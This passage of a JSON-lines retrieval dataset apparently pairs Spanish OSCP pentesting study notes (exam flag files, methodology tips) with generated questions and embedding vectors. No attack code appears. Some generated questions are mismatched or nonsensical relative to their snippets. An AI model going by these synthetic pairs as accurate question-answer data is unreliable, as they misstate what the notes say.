0.04324, -0.0732, 0.07152, 0.12771, -0.02449, -0.01203, -0.17606, 0.07528, 0.07169, 0.06195, 0.06723, -0.059, 0.03453, -0.07751, -0.10334, 0.10836, 0.01145, 0.13511, 0.02138, -0.08626, 0.0056, 0.0227, -0.10872, -0.03029, -0.13425, 0.11171, -0.15613, 0.09663, -0.04277, 0.01778, -0.0348, -0.13621, 0.0554, -0.04421, 0.03618, -0.04466, 0.06583, -0.03123, -0.01176, 0.04812, 0.08962, -0.0508, -0.0451, 0.00162, -0.07208, 0.03329, 0.02318, -0.00382, 0.00886, 0.02472, 0.00027, -0.03212, -0.08708, -0.10416, -0.08332, 0.069, 0.06504, 0.06233, -0.01641, -0.00752, -0.07553, -0.00617, -0.00057, -0.03139, 0.03903, 0.05968, -0.07238, 0.06735, -0.05121, -0.0077, 0.06812, -0.04037, -0.01997, -0.04576, 0.11691, -0.15891, 0.01205, 0.09829, 0.0083, -0.00203, -0.05846, 0.03271, 0.01521, -0.07959, -0.00428, -0.04463, 0.04133, -0.00354, 0.05385, 0.09647, 0.06198, -0.03257, 0.04755, 0.07154, -0.01948, -0.0169, -0.06658, -0.02832, 0.04251, -0.06539, -0.02064, 0.01519, -0.01682, -0.08456, 0.02195, -0.00273, 0.01871, 0.06705, 0.03032, -0.06617, 0.00728, 0.05381, 0.10705, -0.01931, -0.09418, 0.00043, 0.0617, 0.05893, -0.11484, -0.01402, -0.07318, 0.086, 0.03373, 0.04838, 0.02123, -0.01556, 0.12321, 0.04792, 0.03607, -0.07245, 0.02764, -0.05154, 0.05384, -0.09697, -0.01583, -0.03276, 0.03996, -0.00146, -0.01312, -0.00219, -0.01714, -0.0837, -0.01765, 0.05991, -0.03013, 0.05681, 0.04937, -0.05637, 0.03552, -0.04154, -0.06399, 0.01075, -0.02065, 0.01895, -0.00191, -0.07658, -0.07205, 0.03258, -0.0733, 0.01645, 0.04078, -0.00897, 0.07298, -0.07016, -0.01796, 0.04439, -0.02703, 0.10815, -0.02461, -0.04743, -0.06458, 0.01271, 0.01217, -0.03672, -0.00455, -0.0334, 0.07618, 0.00215, -0.03366, -0.01472, 0.03029, 0.08283, 0.0347, 0.02517, -0.00213, 0.04707, 0.03052, -0.00472, -0.01722, 0.01149, -0.08942, 0.00719, -0.09051, 0.02495, -0.02629, 0.02883, -0.01649, 0.03202, 0.03904, 0.05022, -0.02563, 0.00958, -0.00962, 0.03228, 0.03263, -0.0192, 0.02424, 0.08102, -0.03697, -0.03635, 0.01392, 0.01825, -0.02512, -0.02594, -0.09157, -0.03269, -0.06643, 0.01992, -0.06662, -0.10633, -0.0483, -0.07868, -0.02962, -0.00157, -0.00705, -0.01629, 0.12598]} +{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Pruebas (flags)\n- `local.txt` = prueba de usuario.\n- `proof.txt` = prueba de root/SYSTEM.\n- Cada flag con el **hostname visible** (`ipconfig` / `ifconfig`) en la captura.", "indexar": "que herramienta sirve para extraer flags desde un archivo local?", "v": [0.14019, 0.01468, -0.08667, -0.20296, -0.02568, -0.13585, -0.04398, -0.01021, -0.00192, -0.07293, -0.12974, -0.08843, 0.01214, -0.05539, 0.08989, 0.00155, 0.10561, -0.11243, 0.07438, 0.0059, -0.07907, 0.12301, -0.07604, -0.06166, -0.07136, -0.06772, -0.01376, 0.03957, -0.24478, 0.0656, 0.02001, 0.09109, 0.02178, -0.01489, -0.04093, -0.0289, 0.08107, 0.05172, -0.13771, 0.00684, 0.03156, 0.02287, -0.12769, 0.03845, -0.09626, -0.02076, 0.00291, 0.07098, 0.10916, 0.07933, -0.00743, -0.21162, -0.03696, 0.00671, -0.05682, -0.09873, 0.08203, -0.21415, 0.00937, -0.03867, -0.12525, 0.02083, -0.0789, -0.06165, -0.00964, 0.00333, 0.00708, -0.03605, -0.09755, 0.01867, -0.10646, 0.07703, 0.14927, -0.02561, -0.09284, 0.01448, -0.00082, -0.09198, 0.04755, -0.02061, 0.06158, -0.0231, -0.03361, -0.03662, -0.09819, -0.09256, 0.01694, 0.00606, 0.0428, -0.10889, 0.05049, 0.07427, 0.03158, 0.01043, 0.01036, -0.04683, 0.02746, 0.04202, 0.04787, -0.01207, 0.12172, -0.14083, -0.0225, 0.08186, 0.11702, 0.00477, -0.02811, 0.07355, -0.01081, 0.04242, 0.08538, 0.00802, 0.06494, 0.14265, -0.0781, 0.03754, 0.01753, -0.00291, -0.00773, 0.02318, 0.02841, -0.06093, 0.0033, -0.00367, -0.02445, -0.04715, -0.06828, 0.06166, -0.03323, -0.03165, -0.00131, 0.05277, -0.02796, 0.00358, -0.02915, -0.02036, 0.08699, -0.12704, -0.03754, -0.05388, 0.07151, -0.04283, -0.02151, -0.00552, 0.05224, 0.04347, -0.02754, 0.02147, -0.01428, -0.06784, 0.06515, -0.12203, -0.01233, -0.02522, -0.06658, 0.04278, 0.02351, -0.01068, -0.10812, 0.01812, -0.03713, -0.06747, 0.05943, 0.00179, 0.00953, -0.07329, -0.02545, 0.03121, 0.07111, 0.00624, 0.03162, 0.03341, 0.04912, -0.09703, -0.04161, 0.00086, 0.00864, -0.03589, 0.02858, -0.03083, -0.0254, 0.0345, 0.00108, 0.06634, 0.01462, -0.09226, 0.06868, -0.0449, 0.00828, 0.01069, -0.02624, -0.01674, 0.00099, 0.00358, -0.02128, 0.03658, -0.0229, -0.0223, 0.01547, 0.00028, -0.04889, -0.02316, -0.05396, 0.00746, 0.00967, 0.08512, -0.03744, -0.04319, -0.02192, -0.00861, 0.01243, 0.05472, 0.0243, 0.01467, -0.01969, -0.01781, 0.02402, 0.02902, -0.01103, -0.05195, -0.00337, 0.00783, 0.06858, -0.02929, -0.0197, 0.03455, 0.01037, 0.00625, -0.02441, -0.03702, 0.06838, 0.0749, -0.03288, 0.02892, -0.00086, -0.08398, 0.02098, 0.01145, -0.03566, -0.09667, -0.00649, 0.03016, -0.00759, -0.02472, -0.04877, -0.053, 0.00977, -0.0044, 0.03043, -0.07974, -0.04423, -0.04953, 0.08736, 0.05049, 0.03246, 0.01941]} +{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Pruebas (flags)\n- `local.txt` = prueba de usuario.\n- `proof.txt` = prueba de root/SYSTEM.\n- Cada flag con el **hostname visible** (`ipconfig` / `ifconfig`) en la captura.", "indexar": "con que puedo montar una prueba de usuario con hostname visible?", "v": [0.14461, 0.04074, -0.22865, -0.18345, -0.04583, 0.01756, -0.0944, -0.0065, 0.00289, -0.17517, -0.03244, -0.03106, 0.02323, 0.0068, 0.01975, 0.03197, 0.11313, -0.04941, -0.0205, 0.0434, 0.02099, -0.05505, -0.04618, -0.00584, 0.00352, 0.05286, -0.00656, -0.01729, -0.05163, -0.08976, 0.02147, 0.01356, -0.02475, 0.03804, -0.04441, -0.07165, -0.00322, -0.09301, 0.05545, 0.1279, 0.06111, -0.04016, -0.00992, 0.08201, -0.09503, 0.09765, -0.03483, -0.12864, 0.00241, -0.08471, 0.03811, -0.10208, -0.22958, 0.00853, 0.00653, -0.0426, 0.11606, -0.03149, 0.02198, 0.00996, -0.01422, -0.03119, 0.03604, 0.12561, -0.01096, -0.02399, -0.03805, 0.11296, -0.18482, 0.00048, -0.00134, -0.00859, -0.03283, -0.06275, 0.07315, 0.07374, 0.08383, -0.03011, 0.06936, 0.00562, -0.04113, -0.02832, -0.04673, 0.06139, -0.10607, -0.07261, -0.02764, -0.11364, 0.07852, 0.00935, 0.16319, 0.06043, 0.09301, 0.02968, -0.01121, -0.08541, 0.12659, 0.0261, -0.026, -0.08842, 0.0034, 0.10944, 0.01528, 0.17008, 0.10046, 0.00569, 0.04451, -0.0574, -0.0084, -0.09012, 0.10241, -0.00626, -0.20481, -0.04357, -0.0975, -0.07017, -0.07041, -0.00706, -0.02103, -0.02863, -0.07434, -0.0234, -0.00166, 0.01485, 0.06386, -0.02148, 0.03582, 0.00085, -0.04274, -0.01173, -0.01369, 0.06003, 0.00256, 0.01627, -0.03415, 0.03213, -0.10985, -0.06745, 0.03565, 0.05072, 0.05203, 0.05352, -0.0324, -0.02054, 0.04993, 0.03841, -0.05982, -0.08843, -0.02373, 0.00802, -0.01113, 0.05573, -0.01674, 0.02871, -0.14394, 0.00559, 0.06274, -0.02212, 0.02834, 0.03737, -0.03458, 0.00832, -0.04518, 0.00406, 0.03432, -0.01892, -0.02168, 0.01157, 0.05609, -0.00766, -0.04656, 0.08718, -0.06615, -0.07512, 0.09377, 0.03013, -0.03594, -0.08543, -0.0281, -0.07063, 0.00661, -0.00598, -0.01404, -0.00241, 0.00681, -0.00012, 0.03525, -0.00878, 0.02442, -0.00765, 0.01402, 0.05332, -0.05336, 0.04262, 0.05352, -0.02786, -0.00829, 0.01653, -0.03156, -0.07406, -0.07928, -0.02444, -0.00969, -0.01797, 0.00335, -0.02409, -0.04608, 0.10938, 0.03128, 0.04565, -0.01187, -0.0193, 0.07391, -0.06752, -0.05565, 0.04199, 0.05184, -0.01719, -0.09649, -0.01248, 0.01076, 0.05124, 0.07266, 0.00453, 0.02295, 0.05096, 0.06733, -0.0007, 0.04893, 0.0018, -0.01646, -0.00432, -0.01381, -0.03282, 0.06339, 0.00881, 0.0126, 0.00909, -0.05016, -0.02916, -0.00651, 0.08265, 0.01317, -0.03216, 0.0364, -0.03929, -0.07733, 0.04466, -0.01005, -0.03249, -0.06054, 0.00792, 0.0163, -0.08061, -0.02727, -0.00242]} +{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Pruebas (flags)\n- `local.txt` = prueba de usuario.\n- `proof.txt` = prueba de root/SYSTEM.\n- Cada flag con el **hostname visible** (`ipconfig` / `ifconfig`) en la captura.", "indexar": "cual es una alternativa libre a las pruebas de root o sistema?", "v": [-0.06946, 0.01244, -0.09883, -0.11991, -0.03862, -0.01308, -0.02013, -0.07645, -0.07209, -0.03322, -0.17457, -0.15161, 0.03381, -0.01256, 0.12505, -0.08928, -0.03617, -0.07048, -0.02797, -0.07907, -0.15477, -0.15104, -0.11699, -0.05299, -0.00183, 0.12514, 0.04389, 0.06712, -0.00992, 0.04586, 0.00499, 0.00167, 0.13414, -0.02639, -0.15637, 0.05365, 0.13176, 0.06932, 0.11606, 0.02882, 0.00714, -0.122, -0.01633, 0.12729, 0.00366, -0.06684, -0.05586, 0.00743, 0.00276, -0.07104, -0.0696, -0.10543, -0.03821, -0.026, 0.07734, -0.08423, 0.04329, -0.13511, -0.06654, 0.01738, -0.07576, 0.01328, 0.06646, -0.07851, 0.07476, -0.02614, -0.03106, -0.03273, -0.08408, 0.09793, 0.08772, 0.04338, 0.06152, -0.01901, -0.15017, 0.08174, 0.00501, -0.04258, -0.00068, -0.00745, 0.07607, -0.04123, -0.03266, 0.05613, -0.02652, -0.04702, 0.01376, -0.04438, -0.03573, 0.01436, 0.03682, -0.00019, 0.02233, 0.14723, 0.08904, -0.08319, 0.03446, 0.02077, -0.03186, 0.01917, 0.11955, 0.04937, -0.08121, 0.04412, -0.03432, -0.09861, 0.00139, 0.04133, -0.01233, -0.04092, -0.03294, 0.05158, -0.00973, 0.04671, -0.04875, -0.05808, -0.04529, 0.04765, -0.06359, -0.00029, -0.02983, 0.00625, -0.06395, -0.12166, 0.04168, 0.00715, 0.05909, 0.05919, -0.0003, 0.10839, 0.11442, -0.00947, -0.0382, -0.01119, -0.10251, -0.05951, 0.02221, 0.00679, 0.03762, -0.00551, -0.05148, 0.03511, 0.06202, -0.09949, 0.06317, -0.00921, -0.03767, -0.04496, -0.02941, -0.07572, -0.14789, -0.01179, -0.02636, 0.1008, -0.12371, -0.03018, 0.00019, -0.00596, -0.01403, 0.04713, -0.00896, -0.10716, -0.06211, 0.04935, -0.01091, 0.01092, 0.02655, -0.05972, -0.03699, 0.01028, 0.00532, 0.08448, 0.01647, -0.02246, 0.10845, -0.01581, 0.01476, -0.17227, -0.00358, -0.00584, 0.02149, 0.07315, -0.0301, -0.0303, 0.03403, -0.00519, -0.00031, 0.05024, 0.09451, 0.00047, 0.05493, 0.05162, -0.02556, -0.01088, 0.03377, 0.07954, 0.02233, -0.07054, -0.03557, 0.00912, -0.1049, -0.01838, 0.01315, -0.06211, -0.01988, -0.00945, 0.05026, -0.02284, 0.02033, 0.06255, 0.0056, 0.06879, 0.13971, 0.00698, -0.07637, 0.02432, -0.03205, -0.00035, -0.01039, -0.04836, 0.02796, 0.0504, 0.02911, 0.04978, -0.07332, -0.00189, -0.00749, 0.0264, -0.01098, -0.01858, 0.02938, -0.04825, 0.04485, 0.03925, 0.02332, -0.03817, -0.01189, 0.03973, 0.01219, -0.06606, 0.02112, 0.10506, -0.017, -0.04635, -0.02374, -0.00236, -0.07603, -0.05938, -0.00502, -0.06847, -0.02144, 0.05291, 0.01679, -0.03463, 0.02685, 0.01113]} +{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Anti-pΓ‘nico\n- Ver GestiΓ³n del tiempo y Trampas de enumeraciΓ³n.\n- Sin Reporte OSCP **no apruebas**, aunque saques 100 puntos tΓ©cnicos.\n\nRelacionado: MetodologΓ­a OSCP Β· Reglas de herramientas Β· OSCP MOC", "indexar": "ΒΏquΓ© programa me ayuda a gestionar el tiempo para preparar exΓ‘menes?", "v": [-0.00244, 0.17791, 0.07076, -0.21342, 0.06166, 5e-05, -0.04613, -0.0017, -0.11301, -0.14863, -0.12179, -0.00671, -0.03946, -0.05878, -0.04509, 0.06175, 0.16695, 0.05319, 0.10056, 0.01661, -0.00063, -0.01639, -0.09336, -0.00657, -0.07236, -0.02182, 0.07768, -0.01072, -0.00021, -0.03022, -0.08052, 0.033, 0.00136, -0.14482, 0.06805, 0.15868, 0.06193, 0.05192, -0.03529, 0.09982, -0.01532, -0.00213, 0.0559, -0.03583, 0.12917, -0.0033, 0.10955, 0.0217, -0.03422, -0.10763, -0.04213, -0.04022, 0.09407, -0.05325, -0.05574, -0.04822, 0.06454, -0.20483, -0.06214, -0.0769, 0.08256, -0.06749, 0.09103, 0.06696, 0.11307, -0.02586, 0.06667, 0.0395, -0.08003, 0.04914, -0.11376, -0.02111, 0.03317, -0.04278, -0.1095, -0.08269, 0.0646, 0.07105, 0.07375, -0.12496, -0.03413, 0.0483, 0.04278, 0.01604, -0.0407, -0.0893, -0.05746, 0.00542, -0.07718, -0.02535, -0.01376, -0.05262, 0.01965, -0.0355, 0.05746, -0.02741, 0.05523, -0.02498, 0.01346, 0.02869, 0.03845, -0.09842, -0.07321, 0.08326, -0.15303, 0.09971, 0.04004, 0.02769, -0.13291, 0.0744, -0.10157, 0.02429, -0.0437, -0.07145, -0.05623, 0.0675, 0.07172, 0.05206, -0.08074, -0.04287, -0.03577, 0.04771, -0.03467, 0.08996, 0.1349, 0.01984, 0.09391, 0.015, 0.02259, 0.06262, -0.03509, -0.03624, -0.01845, -0.03933, -0.06246, -0.05233, -0.02641, 0.00954, 0.03155, -0.07853, -0.06053, 0.06114, 0.01363, -0.00039, 0.02022, -0.00105, 0.01213, -0.02589, 0.02384, -0.0008, -0.00799, -0.06303, 0.09552, 0.10021, -0.05307, -0.11305, 0.04755, 0.03278, -0.07035, -0.05204, -0.05506, 0.00807, -0.01072, -0.08498, 0.04683, 0.00131, 0.0397, 0.06678, 0.01811, 0.0558, 0.01103, 0.00666, 0.06977, -0.05231, 0.02766, -0.03865, 0.0644, -0.10074, -0.03539, 0.01795, -0.00836, 0.00737, 0.04177, 0.06958, 0.01439, 0.01454, 0.01135, 0.05334, -0.0121, 0.00869, -0.02283, -0.00448, -0.02051, -0.03551, 0.03452, 0.01886, 0.00329, -0.04787, 0.01612, 0.01792, -0.07961, -0.06856, 0.03488, 0.0091, -0.01683, 0.09307, -0.04636, 0.10112, 0.06247, 0.01189, -0.03477, 0.05965, 0.07311, 0.00757, -0.04087, -0.03333, -0.0085, 0.06376, -0.01434, -0.03887, -0.03804, 0.02731, 0.03523, 0.04652, -0.03676, -0.00865, 0.106, 0.02045, 0.00216, 0.03688, -0.00916, -0.07057, 0.06123, 0.01761, 0.05534, -0.0977, 0.02093, -0.0245, 0.04337, -0.04351, 0.0139, 0.08565, 0.01685, -0.04731, -0.04324, 0.03502, -0.02352, 0.04296, -0.01656, 0.02007, 0.0117, -0.01086, 0.01969, 0.00694, 0.02237, -0.01019]} +{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Anti-pΓ‘nico\n- Ver GestiΓ³n del tiempo y Trampas de enumeraciΓ³n.\n- Sin Reporte OSCP **no apruebas**, aunque saques 100 puntos tΓ©cnicos.\n\nRelacionado: MetodologΓ­a OSCP Β· Reglas de herramientas Β· OSCP MOC", "indexar": "con quΓ© herramienta puedo hacer trampas de enumeraciΓ³n?", "v": [0.0116, 0.15159, -0.18013, -0.12409, 0.06534, 0.05022, 0.02656, 0.08241, -0.07474, 0.0347, -0.08899, 0.08442, 0.06114, -0.02676, 0.06738, 0.17662, 0.05228, -0.04914, 0.13908, 0.01299, -0.01064, -0.08656, -0.16372, -0.01187, -0.11531, -0.11857, -0.03964, -0.04449, -0.20776, 0.0453, -0.04054, 0.11995, 0.08965, -0.13161, -0.05064, 0.03535, 0.01129, -0.0083, 0.06378, 0.03633, -0.00593, 0.03466, -0.08145, -0.02224, -0.02663, 0.0029, -0.03195, -0.03082, -0.00798, 0.07678, -0.12505, -0.13194, -0.09436, -0.17685, 0.00068, -0.17127, 0.18024, -0.17393, -0.00191, -0.11078, -0.02987, 0.00789, -0.05143, 0.01607, -0.06838, 0.00378, 0.00776, -0.11409, 0.02339, 0.121, 0.09349, -0.02445, -0.02332, -0.01098, -0.03197, -0.03447, 0.01017, -0.00147, 0.05837, -0.00734, 0.01276, -0.05524, -0.04739, -0.0026, -0.02119, -0.06398, 0.05468, 0.05777, 0.00558, -0.09207, 0.01976, 0.15122, 0.04391, 0.05019, 0.04521, -0.08512, 0.05208, -0.02025, 0.02031, 0.01954, 0.11206, -0.08477, -0.16108, 0.10327, -0.08904, 0.03945, -0.02151, 0.00446, -0.06167, -0.08814, 0.03651, 0.0098, -0.0247, 0.02122, -0.01965, 0.05188, -0.06494, 0.0282, 0.01296, -0.03016, 0.02555, 0.04802, -0.14545, 0.00287, 0.07346, -0.02796, -0.03028, 0.09689, -0.02144, -0.05293, 0.03381, -0.03872, -0.06841, 0.00092, 0.02898, -0.02061, 0.04414, -0.08015, 0.05969, -0.04493, 0.00301, 0.04009, -0.04369, -0.09679, -0.01912, 0.00219, -0.0012, -0.06094, -0.00758, 0.01039, 0.05724, -0.04575, 0.03051, 0.0748, 0.06585, -0.01813, 0.035, 0.05864, -0.09114, 0.05739, -0.06415, -0.04706, 0.01937, -0.00243, 0.04531, -0.00922, 0.05687, 0.02849, -0.02495, 0.02116, -0.02477, 0.0159, 0.05304, 0.01854, 0.01547, -0.04851, -0.0625, 0.05608, -0.07213, -0.09308, -0.00405, -0.01976, -0.01813, -0.03789, 0.05799, -0.03417, 0.00111, -0.03965, 0.02252, 0.08603, -0.01948, 0.01681, 0.02114, -0.07296, 0.01337, -0.00226, 0.05113, -0.01186, -0.00544, -0.02591, -0.01929, 5e-05, 0.01744, -0.0453, 0.03033, 0.0582, -0.03024, -0.031, 0.0096, 0.05805, 0.06359, 0.02384, 0.0084, -0.05292, -0.01042, 0.00685, -0.04813, 0.06445, -0.03759, -0.03338, 0.04792, 0.02492, 0.05026, 0.04034, -0.02656, 0.03023, -0.00658, 0.05665, 0.00463, 0.04319, 0.001, -0.06193, 0.02654, -0.02324, -0.00502, -0.09156, 0.01616, -0.04318, -0.03803, 0.01151, -0.02858, 0.01902, 0.02854, -0.03106, -0.05785, -0.00493, -0.00758, -0.00311, -0.01916, -0.08667, -0.02236, -0.03645, 0.05167, -0.03443, 0.00046, -0.001]} +{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "# MetodologΓ­a OSCP\n\n> El truco real del OSCP no es saber 200 tΓ©cnicas, es tener una **metodologΓ­a repetible**.\n> La gente suspende por **saltarse pasos** o por **obsesionarse con un vector**, no por desconocimiento tΓ©cnico.", "indexar": "que metodo seguΓ­s para resolver las pruebas de OSCP?", "v": [-0.01794, -0.03535, -0.12581, -0.12827, -0.01731, -0.17218, 0.01515, -0.00202, -0.03331, -0.02108, -0.0485, 0.0465, 0.03843, -0.08389, 0.07009, -0.06029, 0.03293, -0.00123, -0.00637, -0.11064, -0.06258, -0.14304, -0.16523, -0.0315, 0.1093, 0.17128, -0.01466, -0.04927, 0.00383, -0.10844, -0.12777, 0.00965, 0.03408, 0.01872, -0.17585, 0.09385, -0.14696, -0.10573, -0.07395, 0.17136, -0.07396, -0.09948, 0.01912, 0.03559, 0.10549, -0.04939, 0.09318, 0.02758, -0.05537, -0.0363, -0.00189, -0.12521, -0.09545, -0.01976, -0.12931, -0.10535, -0.06942, 0.05436, 0.04999, -0.07116, -0.00588, -0.02193, -0.00726, -0.08116, 0.05992, -0.10095, -0.00286, 0.0538, -0.09869, 0.08245, 0.01194, 0.11992, -0.04693, 0.05559, -0.05711, -0.04139, 0.03932, -0.02133, 0.17753, 0.00601, -0.05762, -0.08484, -0.02113, 0.04471, -0.10344, -0.00279, 0.09703, -0.03855, -0.01126, -0.12552, -0.09723, 0.00799, 0.04763, 0.01792, 0.06512, -0.11837, 0.09091, 0.01247, 0.07238, 0.01171, 0.05346, 0.04873, -0.08346, 0.00162, -0.094, -0.02033, 0.06385, 0.01707, 0.02676, -0.04224, 0.00151, 0.08041, -0.01041, 0.07478, -0.16283, -0.02357, 0.05814, -0.01934, -0.09381, -0.01541, -0.07002, 0.07128, -0.07732, 0.03815, 0.05348, -0.0287, 0.1046, 0.04035, 0.00672, 0.05214, 0.02214, 0.00232, -0.06571, 0.05613, 0.00361, -0.00211, -0.06405, 0.00383, 0.01587, -0.01858, 0.0279, 0.00535, 0.05508, -0.06255, 0.06694, -0.03303, -0.06836, -0.02151, -0.04805, -0.06553, -0.02341, 0.01459, 0.00659, 0.02415, -0.1185, -0.03294, 0.05564, 0.01718, -0.03389, 0.11516, -0.05238, 0.01546, -0.0313, 0.04819, 0.03269, -0.01947, 0.00273, -0.02401, -0.06628, -0.04893, 0.02401, 0.01509, -0.06027, -0.03611, 0.09056, 0.05751, 0.01513, -0.0751, -0.04234, 0.03318, -0.04733, 0.07753, 0.01947, 0.00923, 0.03245, -0.00404, 0.01307, 0.06204, 0.06827, 0.04101, 0.04869, -0.0115, -0.02791, -0.01467, -0.04411, 0.04764, 0.09974, -0.05252, -0.03135, -0.04055, -0.10467, -0.00905, 0.02607, -0.03305, -0.02257, -0.01782, -0.01151, 0.04561, 0.0153, 0.01022, -0.0348, -0.00262, 0.11152, -0.05477, -0.0228, 0.04671, -0.02004, -0.00242, -0.07493, 0.02866, 0.03157, 0.04968, -0.05354, 0.02122, -0.05564, 0.01842, 0.00373, 0.03659, 0.00467, 9e-05, 0.03401, -0.01158, 0.06849, -0.03499, 0.03474, 0.04742, -0.02446, -0.02404, 0.01363, -0.03585, 0.00408, 0.01581, 0.00958, 0.00319, -0.02404, -0.03964, -0.03887, -0.07187, 0.04065, -0.0262, 0.00977, -0.0715, -0.00214, -0.04087, 0.01237, 0.02728]} +{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "# MetodologΓ­a OSCP\n\n> El truco real del OSCP no es saber 200 tΓ©cnicas, es tener una **metodologΓ­a repetible**.\n> La gente suspende por **saltarse pasos** o por **obsesionarse con un vector**, no por desconocimiento tΓ©cnico.", "indexar": "como debo estructurar mi estudio para pasar el examen de OSCP?", "v": [-0.09171, -0.14562, -0.10483, -0.24074, -0.02121, -0.12641, 0.00072, 0.0154, -0.11517, -0.04887, -0.13425, 0.05258, -0.06936, -0.01203, 0.00314, -0.08314, 0.06736, 0.02226, -0.00576, -0.03114, -0.07441, -0.04428, -0.03295, 0.19524, 0.03866, 0.09302, -0.1418, -0.05629, -0.00378, -0.05638, -0.01875, 0.15849, 0.08192, -0.10528, -0.06563, -0.01651, 0.00582, -0.1083, -0.10576, 0.20288, 0.01738, -0.03385, 0.06423, 0.03149, 0.10647, 0.01092, 0.03325, 0.15259, -0.07656, -0.06131, -0.05691, -0.0241, -0.04809, 0.04127, -0.02623, -0.04304, -0.03224, -0.02993, 0.21084, -0.07019, 0.06742, 0.02257, 0.02962, -0.0273, 0.14052, -0.057, -0.06902, 0.07205, -0.06681, 0.02621, -0.04105, 0.10049, -0.04758, 0.01978, -0.03624, -0.03442, 0.03156, -0.05122, 0.15171, -0.0036, 0.0421, -0.00923, -0.09759, 0.11154, -0.09468, -0.01963, -0.01868, -0.02697, -0.02995, 0.03152, -0.09925, 0.00375, -0.0082, 0.06993, -0.01953, -0.12003, -0.04728, -0.02226, 0.03018, -0.02134, 0.03508, 0.08543, -0.03325, 0.00362, -0.12596, 0.05807, -0.03356, 0.04561, -0.00576, 0.01408, 0.034, 0.02923, -0.06994, -0.04214, -0.1024, -0.09143, 0.05797, 0.0934, -0.03792, -0.01266, 0.02434, 0.07033, -0.03652, 0.03144, -0.09828, 0.03259, 0.09376, 0.08723, 0.04654, 0.0447, -0.01025, -0.01494, -0.06466, 0.03183, -0.04818, -0.08551, -0.04177, -0.0705, -0.00298, -0.01365, 0.0063, 0.11448, 0.00237, -0.0315, 0.01888, 0.01842, -0.0377, -0.01117, -0.03332, -0.04563, -0.10513, 0.03852, 0.00497, -0.00393, -0.03849, -0.01008, 0.05743, 0.00146, 0.08775, 0.05555, -0.06327, 0.00707, -0.03392, 0.02131, 0.00913, 0.06604, -0.05865, -0.07137, -0.00307, -0.04411, 0.02196, -0.07985, -0.00567, -0.0325, 0.07347, -0.01441, 0.00028, -0.06825, -0.06617, -0.03248, -0.04227, 0.04615, -0.00496, 0.03598, 0.04259, 0.05656, 0.00595, -0.00522, 0.0832, 0.05067, 0.02729, -0.01717, -0.00833, -0.02733, 0.01858, 0.00588, -0.00515, -0.08519, 0.03135, 0.04409, -0.05434, -0.0314, -0.02875, -0.04404, 0.03379, 0.00552, 0.0329, 0.04906, 0.02646, 0.06148, -0.01327, -0.02029, 0.05232, -0.0575, 0.03039, 0.02694, 0.10756, 0.101, -0.02305, -0.01464, -0.01399, 0.05524, 0.05013, 0.07629, -0.06489, -0.01514, 0.01819, -0.00411, 0.04489, 0.00579, 0.04038, 0.01018, 0.02542, 0.0113, 0.0592, 0.02694, -0.02934, 0.00589, -0.03924, -0.05731, 0.05048, 0.02485, -0.05097, -0.0601, -0.02621, -0.02725, -0.03788, -0.0422, -0.01524, -0.05356, -0.03968, -0.05897, 0.02948, -0.0503, 0.02658, 0.0193]} +{"tipo": "pregunta", "herramienta": "MetodologΓ­a OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/MetodologΓ­a OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "# MetodologΓ­a OSCP\n\n> El truco real del OSCP no es saber 200 tΓ©cnicas, es tener una **metodologΓ­a repetible**.\n> La gente suspende por **saltarse pasos** o por **obsesionarse con un vector**, no por desconocimiento tΓ©cnico.", "indexar": "cual es la mejor estrategia repetible para superar el OSCP?", "v": [-0.16315, -0.06867, -0.113, -0.07911, -0.03788, -0.22733, 0.0272, -0.02347, -0.02459, -0.05572, -0.05511, -0.02359, -0.01384, -0.04271, 0.08417, -0.01544, -0.03842, 0.161, 0.08754, -0.08548, -0.01399, -0.07434, -0.02945, 0.02722, 0.08538, 0.03416, 0.02007, 0.02896, -0.11138, -0.1006, -0.08951, 0.14073, 0.00591, -0.10644, -0.01008, 0.12479, -0.16097, 0.0063, 0.01154, 0.08152, -0.06259, 0.04167, -0.17508, 0.06524, 0.18099, 0.02882, 0.03757, 0.04929, 0.03038, -0.04937, -0.07216, 0.01985, -0.04835, -0.02809, 0.05609, 0.03254, -0.04472, -0.0825, -0.00567, -0.13808, 0.00618, -0.04858, -0.05504, -0.15067, 0.00122, -0.10569, -0.11684, -0.04433, -0.12747, 0.02486, 0.02529, 0.10047, -0.00703, 0.05617, 0.02217, 0.03558, 0.20801, -0.03344, 0.06719, 0.00134, 0.0783, -0.19321, -0.14318, 0.13925, -0.10225, -0.02315, 0.02144, 0.04202, -0.02365, -0.06119, -0.01202, -0.07076, -0.03275, -0.04526, 0.01293, -0.14207, 0.02953, -0.04635, 0.03681, 0.05803, 0.00954, -0.04895, -0.18475, 0.03538, -0.0341, 0.03173, -0.0166, -0.02362, -0.03, -0.04278, -0.07893, -0.06827, -0.01338, 0.08126, -0.04162, -0.02697, -0.00626, -0.02263, -0.02815, 0.01187, -0.09398, 0.10731, -0.04697, -0.01168, 0.01038, 0.08674, 0.01217, 0.02155, -0.00669, 0.00973, -0.03357, 0.0813, -0.02165, 0.00555, -0.07803, -0.04356, 0.00134, -0.05474, -0.08955, 8e-05, -0.03105, 0.04153, 